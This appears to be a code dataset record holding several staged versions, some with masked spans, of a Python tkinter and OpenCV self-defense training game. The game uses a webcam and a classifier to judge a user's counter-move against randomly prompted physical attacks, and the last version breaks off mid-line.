"step-1": "<mask token>\n\n\ndef calcSuccess(predictedCounter, randAssault):\n vidLabel.pack_forget()\n if predictedCounter == 'parry_R':\n instructionLabel.config(text='RIGHT PARRY')\n if randAssault == 4 or randAssault == 2:\n descriptionLabel.config(text=\"You've successfully parried!\")\n elif randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'parry_L':\n instructionLabel.config(text='LEFT PARRY')\n if randAssault == 5 or randAssault == 3:\n descriptionLabel.config(text=\"You've successfully parried!\")\n elif randAssault == 2:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'punch_R':\n instructionLabel.config(text='RIGHT PUNCH')\n if randAssault == 0 or randAssault == 1 or randAssault == 4:\n descriptionLabel.config(text=\n \"You've successfully counter attacked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n if predictedCounter == 'punch_L':\n instructionLabel.config(text='LEFT PUNCH')\n if randAssault == 0 or randAssault == 1 or randAssault == 5:\n descriptionLabel.config(text=\n \"You've successfully counter attacked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n if predictedCounter == 'weave_R':\n instructionLabel.config(text='RIGHT WEAVE')\n if randAssault == 1 or randAssault == 3 or randAssault == 5:\n descriptionLabel.config(text=\"You've successfully evaded!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n elif randAssault == 2:\n descriptionLabel.config(text=\"You've been cut!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'weave_L':\n instructionLabel.config(text='LEFT WEAVE')\n if randAssault == 0 or randAssault == 2 or randAssault == 4:\n descriptionLabel.config(text=\"You've successfully evaded!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n elif randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'block':\n instructionLabel.config(text='BLOCK')\n if randAssault == 5 or randAssault == 4:\n descriptionLabel.config(text=\"You've successfully blocked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 0 or randAssault == 1:\n descriptionLabel.config(text=\"You've been grabbed!\")\n descriptionLabel.pack()\n\n\n<mask token>\n\n\ndef show_frame(milliseconds):\n if milliseconds > 0:\n _, frame = cap.read()\n frame = cv2.flip(frame, 1)\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n img = Image.fromarray(cv2image)\n imgtk = ImageTk.PhotoImage(img)\n vidLabel.imgtk = imgtk\n vidLabel.config(image=imgtk)\n root.update()\n root.after(30, show_frame, milliseconds - 30)\n _, frame = cap.read()\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n img = Image.fromarray(cv2image)\n img = img.convert('RGB')\n img.save('imgFile.jpeg')\n if milliseconds == secondsChosen * 3000:\n return ml.predict('imgFile.jpeg')\n\n\n<mask token>\n\n\ndef runPrompt():\n startButton.config(text='Next')\n startButton.pack(side=LEFT)\n resetButton.pack(side=RIGHT)\n descriptionLabel.pack_forget()\n assaultList = ['Grab from your right', 'Grab from your left',\n 'Blade attack from the right', 'Blade attack from the left',\n 'Hit from the right', 'Hit from the left']\n counterList = ['parry_R', 'parry_L', 'weave_R', 'weave_L', 'punch_R',\n 'punch_L', 'block']\n difficultyChoice = difficultyList.get(ACTIVE)\n global secondsChosen\n secondsChosen = 0\n if difficultyChoice[0] == 'E':\n secondsChosen = 6\n elif difficultyChoice[0] == 'M':\n secondsChosen = 3\n else:\n secondsChosen = 1\n print(secondsChosen)\n difficultyList.pack_forget()\n randAssault = random.randint(0, 5)\n instructionLabel.config(text=assaultList[randAssault], font=('Courier', 25)\n )\n vidLabel.pack()\n predictedCounter = show_frame(secondsChosen * 1000)\n if predictedCounter not in counterList:\n predictedCounter = counterList[random.randint(0, 6)]\n root.after(secondsChosen * 1200, calcSuccess, predictedCounter, randAssault\n )\n return 0\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef calcSuccess(predictedCounter, randAssault):\n vidLabel.pack_forget()\n if predictedCounter == 'parry_R':\n instructionLabel.config(text='RIGHT PARRY')\n if randAssault == 4 or randAssault == 2:\n descriptionLabel.config(text=\"You've successfully parried!\")\n elif randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'parry_L':\n instructionLabel.config(text='LEFT PARRY')\n if randAssault == 5 or randAssault == 3:\n descriptionLabel.config(text=\"You've successfully parried!\")\n elif randAssault == 2:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'punch_R':\n instructionLabel.config(text='RIGHT PUNCH')\n if randAssault == 0 or randAssault == 1 or randAssault == 4:\n descriptionLabel.config(text=\n \"You've successfully counter attacked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n if predictedCounter == 'punch_L':\n instructionLabel.config(text='LEFT PUNCH')\n if randAssault == 0 or randAssault == 1 or randAssault == 5:\n descriptionLabel.config(text=\n \"You've successfully counter attacked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n if predictedCounter == 'weave_R':\n instructionLabel.config(text='RIGHT WEAVE')\n if randAssault == 1 or randAssault == 3 or randAssault == 5:\n descriptionLabel.config(text=\"You've successfully evaded!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n elif randAssault == 2:\n descriptionLabel.config(text=\"You've been cut!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'weave_L':\n instructionLabel.config(text='LEFT WEAVE')\n if randAssault == 0 or randAssault == 2 or randAssault == 4:\n descriptionLabel.config(text=\"You've successfully evaded!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n elif randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'block':\n instructionLabel.config(text='BLOCK')\n if randAssault == 5 or randAssault == 4:\n descriptionLabel.config(text=\"You've successfully blocked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 0 or randAssault == 1:\n descriptionLabel.config(text=\"You've been grabbed!\")\n descriptionLabel.pack()\n\n\n<mask token>\nroot.geometry('2000x1100')\n<mask token>\ncanvas.pack(side='top')\n<mask token>\ncanvas.create_image(350, 100, image=logo)\n<mask token>\ndescriptionLabel.pack(side='top')\n<mask token>\ninstructionLabel.pack(side='top')\n<mask token>\n\n\ndef show_frame(milliseconds):\n if milliseconds > 0:\n _, frame = cap.read()\n frame = cv2.flip(frame, 1)\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n img = Image.fromarray(cv2image)\n imgtk = ImageTk.PhotoImage(img)\n vidLabel.imgtk = imgtk\n vidLabel.config(image=imgtk)\n root.update()\n root.after(30, show_frame, milliseconds - 30)\n _, frame = cap.read()\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n img = Image.fromarray(cv2image)\n img = img.convert('RGB')\n img.save('imgFile.jpeg')\n if milliseconds == secondsChosen * 3000:\n return ml.predict('imgFile.jpeg')\n\n\n<mask token>\nbuttonFrame.pack(side='bottom')\n<mask token>\ndifficultyList.insert(1, 'Easy: 6 seconds')\ndifficultyList.insert(2, 'Medium: 3 seconds')\ndifficultyList.insert(3, 'Hard: 1 seconds')\ndifficultyList.pack(side='top')\n<mask token>\n\n\ndef runPrompt():\n startButton.config(text='Next')\n startButton.pack(side=LEFT)\n resetButton.pack(side=RIGHT)\n descriptionLabel.pack_forget()\n assaultList = ['Grab from your right', 'Grab from your left',\n 'Blade attack from the right', 'Blade attack from the left',\n 'Hit from the right', 'Hit from the left']\n counterList = ['parry_R', 'parry_L', 'weave_R', 'weave_L', 'punch_R',\n 'punch_L', 'block']\n difficultyChoice = difficultyList.get(ACTIVE)\n global secondsChosen\n secondsChosen = 0\n if difficultyChoice[0] == 'E':\n secondsChosen = 6\n elif difficultyChoice[0] == 'M':\n secondsChosen = 3\n else:\n secondsChosen = 1\n print(secondsChosen)\n difficultyList.pack_forget()\n randAssault = random.randint(0, 5)\n instructionLabel.config(text=assaultList[randAssault], font=('Courier', 25)\n )\n vidLabel.pack()\n predictedCounter = show_frame(secondsChosen * 1000)\n if predictedCounter not in counterList:\n predictedCounter = counterList[random.randint(0, 6)]\n root.after(secondsChosen * 1200, calcSuccess, predictedCounter, randAssault\n )\n return 0\n\n\ndef reset():\n resetButton.pack_forget()\n startButton.config(text='Start')\n startButton.pack(side=BOTTOM)\n instructionLabel.config(text=instructionText, font=('Courier', 16))\n descriptionLabel.config(text=descriptionText, font=('Courier', 18))\n descriptionLabel.pack(side=TOP)\n difficultyList.pack(side=TOP)\n\n\n<mask token>\nstartButton.pack(side=BOTTOM)\n<mask token>\nroot.mainloop()\ncap.release()\n",
"step-3": "<mask token>\n\n\ndef calcSuccess(predictedCounter, randAssault):\n vidLabel.pack_forget()\n if predictedCounter == 'parry_R':\n instructionLabel.config(text='RIGHT PARRY')\n if randAssault == 4 or randAssault == 2:\n descriptionLabel.config(text=\"You've successfully parried!\")\n elif randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'parry_L':\n instructionLabel.config(text='LEFT PARRY')\n if randAssault == 5 or randAssault == 3:\n descriptionLabel.config(text=\"You've successfully parried!\")\n elif randAssault == 2:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'punch_R':\n instructionLabel.config(text='RIGHT PUNCH')\n if randAssault == 0 or randAssault == 1 or randAssault == 4:\n descriptionLabel.config(text=\n \"You've successfully counter attacked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n if predictedCounter == 'punch_L':\n instructionLabel.config(text='LEFT PUNCH')\n if randAssault == 0 or randAssault == 1 or randAssault == 5:\n descriptionLabel.config(text=\n \"You've successfully counter attacked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n if predictedCounter == 'weave_R':\n instructionLabel.config(text='RIGHT WEAVE')\n if randAssault == 1 or randAssault == 3 or randAssault == 5:\n descriptionLabel.config(text=\"You've successfully evaded!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n elif randAssault == 2:\n descriptionLabel.config(text=\"You've been cut!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'weave_L':\n instructionLabel.config(text='LEFT WEAVE')\n if randAssault == 0 or randAssault == 2 or randAssault == 4:\n descriptionLabel.config(text=\"You've successfully evaded!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n elif randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'block':\n instructionLabel.config(text='BLOCK')\n if randAssault == 5 or randAssault == 4:\n descriptionLabel.config(text=\"You've successfully blocked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 0 or randAssault == 1:\n descriptionLabel.config(text=\"You've been grabbed!\")\n descriptionLabel.pack()\n\n\ncap = cv2.VideoCapture(0)\nroot = tk.Tk()\nroot.geometry('2000x1100')\nldFrame = Frame(root).pack(side='top')\ncanvas = Canvas(ldFrame, width=700, height=200)\ncanvas.pack(side='top')\npilLogo = Image.open('Logo.png')\nlogo = ImageTk.PhotoImage(pilLogo)\ncanvas.create_image(350, 100, image=logo)\ndescriptionText = (\n 'This program trains the user to respond in self defense to common physical threats.'\n )\ndescriptionLabel = tk.Label(ldFrame, justify='center', padx=10, font=(\n 'Courier', 18), wraplength=1900, text=descriptionText)\ndescriptionLabel.pack(side='top')\ncenterFrame = Frame(root).pack()\ncountdownLabel = tk.Label(centerFrame, justify='center', font=('Courier', \n 20), text='')\ninstructionText = (\n 'In this training system, you will be prompted with how an aggressor is approaching you. You may select a difficulty for this system by choosing how much time you would like to be allowed to react. Based on your counter attack, the system will tell you if the attacker has been [Narrowly Avoided], [Stunned], or [Subdued] based on the quality of your reaction. Your success rate will be tracked at the bottom of the screen. Press the [Start] button to begin and the [Stop] button to end the session.'\n )\ninstructionLabel = tk.Label(centerFrame, justify='center', padx=50, pady=50,\n font=('Courier', 16), wraplength=1800, text=instructionText)\ninstructionLabel.pack(side='top')\nvidLabel = Label(root)\n\n\ndef show_frame(milliseconds):\n if milliseconds > 0:\n _, frame = cap.read()\n frame = cv2.flip(frame, 1)\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n img = Image.fromarray(cv2image)\n imgtk = ImageTk.PhotoImage(img)\n vidLabel.imgtk = imgtk\n vidLabel.config(image=imgtk)\n root.update()\n root.after(30, show_frame, milliseconds - 30)\n _, frame = cap.read()\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n img = Image.fromarray(cv2image)\n img = img.convert('RGB')\n img.save('imgFile.jpeg')\n if milliseconds == secondsChosen * 3000:\n return ml.predict('imgFile.jpeg')\n\n\nbuttonFrame = Frame(root)\nbuttonFrame.pack(side='bottom')\ndifficultyList = Listbox(buttonFrame, selectmode=SINGLE, height=3, font=(\n 'Courier', 16))\ndifficultyList.insert(1, 'Easy: 6 seconds')\ndifficultyList.insert(2, 'Medium: 3 seconds')\ndifficultyList.insert(3, 'Hard: 1 seconds')\ndifficultyList.pack(side='top')\ncycling = True\n\n\ndef runPrompt():\n startButton.config(text='Next')\n startButton.pack(side=LEFT)\n resetButton.pack(side=RIGHT)\n descriptionLabel.pack_forget()\n assaultList = ['Grab from your right', 'Grab from your left',\n 'Blade attack from the right', 'Blade attack from the left',\n 'Hit from the right', 'Hit from the left']\n counterList = ['parry_R', 'parry_L', 'weave_R', 'weave_L', 'punch_R',\n 'punch_L', 'block']\n difficultyChoice = difficultyList.get(ACTIVE)\n global secondsChosen\n secondsChosen = 0\n if difficultyChoice[0] == 'E':\n secondsChosen = 6\n elif difficultyChoice[0] == 'M':\n secondsChosen = 3\n else:\n secondsChosen = 1\n print(secondsChosen)\n difficultyList.pack_forget()\n randAssault = random.randint(0, 5)\n instructionLabel.config(text=assaultList[randAssault], font=('Courier', 25)\n )\n vidLabel.pack()\n predictedCounter = show_frame(secondsChosen * 1000)\n if predictedCounter not in counterList:\n predictedCounter = counterList[random.randint(0, 6)]\n root.after(secondsChosen * 1200, calcSuccess, predictedCounter, randAssault\n )\n return 0\n\n\ndef reset():\n resetButton.pack_forget()\n startButton.config(text='Start')\n startButton.pack(side=BOTTOM)\n instructionLabel.config(text=instructionText, font=('Courier', 16))\n descriptionLabel.config(text=descriptionText, font=('Courier', 18))\n descriptionLabel.pack(side=TOP)\n difficultyList.pack(side=TOP)\n\n\nstartButton = Button(buttonFrame, bd=6, padx=20, pady=20, font=('Courier', \n 16), text='Start', fg='green', command=runPrompt)\nstartButton.pack(side=BOTTOM)\nresetButton = Button(buttonFrame, bd=6, padx=20, pady=20, font=('Courier', \n 16), text='Reset', fg='red', command=reset)\nroot.mainloop()\ncap.release()\n",
"step-4": "import tkinter as tk\nfrom tkinter import *\nfrom PIL import ImageTk\nfrom PIL import Image\nimport cv2\nimport numpy as np\nfrom statistics import mode\nimport time\nimport random\nimport predict as ml\n\n\ndef calcSuccess(predictedCounter, randAssault):\n vidLabel.pack_forget()\n if predictedCounter == 'parry_R':\n instructionLabel.config(text='RIGHT PARRY')\n if randAssault == 4 or randAssault == 2:\n descriptionLabel.config(text=\"You've successfully parried!\")\n elif randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'parry_L':\n instructionLabel.config(text='LEFT PARRY')\n if randAssault == 5 or randAssault == 3:\n descriptionLabel.config(text=\"You've successfully parried!\")\n elif randAssault == 2:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'punch_R':\n instructionLabel.config(text='RIGHT PUNCH')\n if randAssault == 0 or randAssault == 1 or randAssault == 4:\n descriptionLabel.config(text=\n \"You've successfully counter attacked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n if predictedCounter == 'punch_L':\n instructionLabel.config(text='LEFT PUNCH')\n if randAssault == 0 or randAssault == 1 or randAssault == 5:\n descriptionLabel.config(text=\n \"You've successfully counter attacked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n if predictedCounter == 'weave_R':\n instructionLabel.config(text='RIGHT WEAVE')\n if randAssault == 1 or randAssault == 3 or randAssault == 5:\n descriptionLabel.config(text=\"You've successfully evaded!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n elif randAssault == 2:\n descriptionLabel.config(text=\"You've been cut!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'weave_L':\n instructionLabel.config(text='LEFT WEAVE')\n if randAssault == 0 or randAssault == 2 or randAssault == 4:\n descriptionLabel.config(text=\"You've successfully evaded!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n elif randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'block':\n instructionLabel.config(text='BLOCK')\n if randAssault == 5 or randAssault == 4:\n descriptionLabel.config(text=\"You've successfully blocked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 0 or randAssault == 1:\n descriptionLabel.config(text=\"You've been grabbed!\")\n descriptionLabel.pack()\n\n\ncap = cv2.VideoCapture(0)\nroot = tk.Tk()\nroot.geometry('2000x1100')\nldFrame = Frame(root).pack(side='top')\ncanvas = Canvas(ldFrame, width=700, height=200)\ncanvas.pack(side='top')\npilLogo = Image.open('Logo.png')\nlogo = ImageTk.PhotoImage(pilLogo)\ncanvas.create_image(350, 100, image=logo)\ndescriptionText = (\n 'This program trains the user to respond in self defense to common physical threats.'\n )\ndescriptionLabel = tk.Label(ldFrame, justify='center', padx=10, font=(\n 'Courier', 18), wraplength=1900, text=descriptionText)\ndescriptionLabel.pack(side='top')\ncenterFrame = Frame(root).pack()\ncountdownLabel = tk.Label(centerFrame, justify='center', font=('Courier', \n 20), text='')\ninstructionText = (\n 'In this training system, you will be prompted with how an aggressor is approaching you. You may select a difficulty for this system by choosing how much time you would like to be allowed to react. Based on your counter attack, the system will tell you if the attacker has been [Narrowly Avoided], [Stunned], or [Subdued] based on the quality of your reaction. Your success rate will be tracked at the bottom of the screen. Press the [Start] button to begin and the [Stop] button to end the session.'\n )\ninstructionLabel = tk.Label(centerFrame, justify='center', padx=50, pady=50,\n font=('Courier', 16), wraplength=1800, text=instructionText)\ninstructionLabel.pack(side='top')\nvidLabel = Label(root)\n\n\ndef show_frame(milliseconds):\n if milliseconds > 0:\n _, frame = cap.read()\n frame = cv2.flip(frame, 1)\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n img = Image.fromarray(cv2image)\n imgtk = ImageTk.PhotoImage(img)\n vidLabel.imgtk = imgtk\n vidLabel.config(image=imgtk)\n root.update()\n root.after(30, show_frame, milliseconds - 30)\n _, frame = cap.read()\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n img = Image.fromarray(cv2image)\n img = img.convert('RGB')\n img.save('imgFile.jpeg')\n if milliseconds == secondsChosen * 3000:\n return ml.predict('imgFile.jpeg')\n\n\nbuttonFrame = Frame(root)\nbuttonFrame.pack(side='bottom')\ndifficultyList = Listbox(buttonFrame, selectmode=SINGLE, height=3, font=(\n 'Courier', 16))\ndifficultyList.insert(1, 'Easy: 6 seconds')\ndifficultyList.insert(2, 'Medium: 3 seconds')\ndifficultyList.insert(3, 'Hard: 1 seconds')\ndifficultyList.pack(side='top')\ncycling = True\n\n\ndef runPrompt():\n startButton.config(text='Next')\n startButton.pack(side=LEFT)\n resetButton.pack(side=RIGHT)\n descriptionLabel.pack_forget()\n assaultList = ['Grab from your right', 'Grab from your left',\n 'Blade attack from the right', 'Blade attack from the left',\n 'Hit from the right', 'Hit from the left']\n counterList = ['parry_R', 'parry_L', 'weave_R', 'weave_L', 'punch_R',\n 'punch_L', 'block']\n difficultyChoice = difficultyList.get(ACTIVE)\n global secondsChosen\n secondsChosen = 0\n if difficultyChoice[0] == 'E':\n secondsChosen = 6\n elif difficultyChoice[0] == 'M':\n secondsChosen = 3\n else:\n secondsChosen = 1\n print(secondsChosen)\n difficultyList.pack_forget()\n randAssault = random.randint(0, 5)\n instructionLabel.config(text=assaultList[randAssault], font=('Courier', 25)\n )\n vidLabel.pack()\n predictedCounter = show_frame(secondsChosen * 1000)\n if predictedCounter not in counterList:\n predictedCounter = counterList[random.randint(0, 6)]\n root.after(secondsChosen * 1200, calcSuccess, predictedCounter, randAssault\n )\n return 0\n\n\ndef reset():\n resetButton.pack_forget()\n startButton.config(text='Start')\n startButton.pack(side=BOTTOM)\n instructionLabel.config(text=instructionText, font=('Courier', 16))\n descriptionLabel.config(text=descriptionText, font=('Courier', 18))\n descriptionLabel.pack(side=TOP)\n difficultyList.pack(side=TOP)\n\n\nstartButton = Button(buttonFrame, bd=6, padx=20, pady=20, font=('Courier', \n 16), text='Start', fg='green', command=runPrompt)\nstartButton.pack(side=BOTTOM)\nresetButton = Button(buttonFrame, bd=6, padx=20, pady=20, font=('Courier', \n 16), text='Reset', fg='red', command=reset)\nroot.mainloop()\ncap.release()\n",
"step-5": "#THIS IS PYTHON3\nimport tkinter as tk\nfrom tkinter import *\nfrom PIL import ImageTk\nfrom PIL import Image #to handle non-gif image formats\n\nimport cv2\nimport numpy as np\nfrom statistics import mode\n\nimport time\n\nimport random\n\nimport predict as ml\n\ndef calcSuccess(predictedCounter, randAssault):\n vidLabel.pack_forget()\n if predictedCounter == \"parry_R\":\n instructionLabel.config(text=\"RIGHT PARRY\")\n if randAssault == 4 or randAssault == 2:\n descriptionLabel.config(text=\"You've successfully parried!\")\n elif randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n\n if predictedCounter == \"parry_L\":\n instructionLabel.config(text=\"LEFT PARRY\")\n if randAssault == 5 or randAssault == 3:\n descriptionLabel.config(text=\"You've successfully parried!\")\n elif randAssault == 2:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n\n if predictedCounter == \"punch_R\":\n instructionLabel.config(text=\"RIGHT PUNCH\")\n if randAssault == 0 or randAssault == 1 or randAssault == 4:\n descriptionLabel.config(text=\"You've successfully counter attacked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n\n if predictedCounter == \"punch_L\":\n instructionLabel.config(text=\"LEFT PUNCH\")\n if randAssault == 0 or randAssault == 1 or randAssault == 5:\n descriptionLabel.config(text=\"You've successfully counter attacked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n\n if predictedCounter == \"weave_R\":\n instructionLabel.config(text=\"RIGHT WEAVE\")\n if randAssault == 1 or randAssault == 3 or randAssault == 5:\n descriptionLabel.config(text=\"You've successfully evaded!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n elif randAssault == 2:\n descriptionLabel.config(text=\"You've been cut!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n\n if predictedCounter == \"weave_L\":\n instructionLabel.config(text=\"LEFT WEAVE\")\n if randAssault == 0 or randAssault == 2 or randAssault == 4:\n descriptionLabel.config(text=\"You've successfully evaded!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n elif randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n\n if predictedCounter == \"block\":\n instructionLabel.config(text=\"BLOCK\")\n if randAssault == 5 or randAssault == 4:\n descriptionLabel.config(text=\"You've successfully blocked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 0 or randAssault == 1:\n descriptionLabel.config(text=\"You've been grabbed!\")\n descriptionLabel.pack()\n\n\ncap = cv2.VideoCapture(0)\n\nroot = tk.Tk() #initialize tkinter by making tk rook widget--consists of window with tile bar and decoration provided by window manager. Root widget must be made first and can only be one.\nroot.geometry(\"2000x1100\")\n\nldFrame = Frame(root).pack(side=\"top\") #frame to hold logo and description\ncanvas = Canvas(ldFrame, width=700, height=200)\ncanvas.pack(side=\"top\")\n\n#open image with pil image because PhotoImage only takes gif\npilLogo = Image.open(\"Logo.png\")\nlogo = ImageTk.PhotoImage(pilLogo) #makes PhotoImage from pil image\ncanvas.create_image(350, 100, image=logo) #adds PhotoImage to Canvas\n\n#make basic description label from text string on the logo description frame\ndescriptionText = \"\"\"This program trains the user to respond in self defense to common physical threats.\"\"\"\ndescriptionLabel = tk.Label(ldFrame, justify=\"center\", padx=10, font=(\"Courier\", 18), wraplength=1900, text=descriptionText)\ndescriptionLabel.pack(side=\"top\")\n\n#make center frame that will show instructions initially and then have \"assaulter\" prompts and live video\ncenterFrame = Frame(root).pack()\ncountdownLabel = tk.Label(centerFrame, justify=\"center\", font=(\"Courier\", 20), text=\"\") #invisible for now because not packed\ninstructionText = \"\"\"In this training system, you will be prompted with how an aggressor is approaching you. You may select a difficulty for this system by choosing how much time you would like to be allowed to react. Based on your counter attack, the system will tell you if the attacker has been [Narrowly Avoided], [Stunned], or [Subdued] based on the quality of your reaction. Your success rate will be tracked at the bottom of the screen. Press the [Start] button to begin and the [Stop] button to end the session.\"\"\"\ninstructionLabel = tk.Label(centerFrame, justify=\"center\", padx=50, pady=50, font=(\"Courier\", 16), wraplength=1800, text=instructionText)\ninstructionLabel.pack(side=\"top\")\n\n#setup to capture video frames\nvidLabel = Label(root)\ndef show_frame(milliseconds):\n if milliseconds > 0:\n #global predictionArr\n _, frame = cap.read()\n #predictionArr.append(predict.get_prediction(frame, \"ace-connection-236822\", \"ICN2459521650166688930\"))\n frame = cv2.flip(frame, 1) #horizontally flips images so is like reflection\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA) #makes normal color\n img = Image.fromarray(cv2image)\n imgtk = ImageTk.PhotoImage(img)\n vidLabel.imgtk = imgtk\n vidLabel.config(image=imgtk)\n root.update()\n root.after(30, show_frame, (milliseconds-30))\n _, frame = cap.read()\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA) \n img = Image.fromarray(cv2image)\n img = img.convert(\"RGB\")\n img.save(\"imgFile.jpeg\")\n if milliseconds == secondsChosen*3000: \n return ml.predict(\"imgFile.jpeg\")\n\n#make bottom frame that hold buttons\nbuttonFrame = Frame(root)\nbuttonFrame.pack(side=\"bottom\")\ndifficultyList = Listbox(buttonFrame, selectmode=SINGLE, height=3, font=(\"Courier\", 16))\ndifficultyList.insert(1, \"Easy: 6 seconds\")\ndifficultyList.insert(2, \"Medium: 3 seconds\")\ndifficultyList.insert(3, \"Hard: 1 seconds\")\ndifficultyList.pack(side=\"top\")\n\ncycling = True\n\ndef runPrompt():\n startButton.config(text=\"Next\")\n startButton.pack(side=LEFT)\n resetButton.pack(side=RIGHT)\n descriptionLabel.pack_forget()\n assaultList = [\"Grab from your right\", \"Grab from your left\", \"Blade attack from the right\", \"Blade attack from the left\", \"Hit from the right\", \"Hit from the left\"]\n counterList = [\"parry_R\", \"parry_L\", \"weave_R\", \"weave_L\", \"punch_R\", \"punch_L\", \"block\"]\n difficultyChoice = (difficultyList.get(ACTIVE))\n global secondsChosen\n secondsChosen 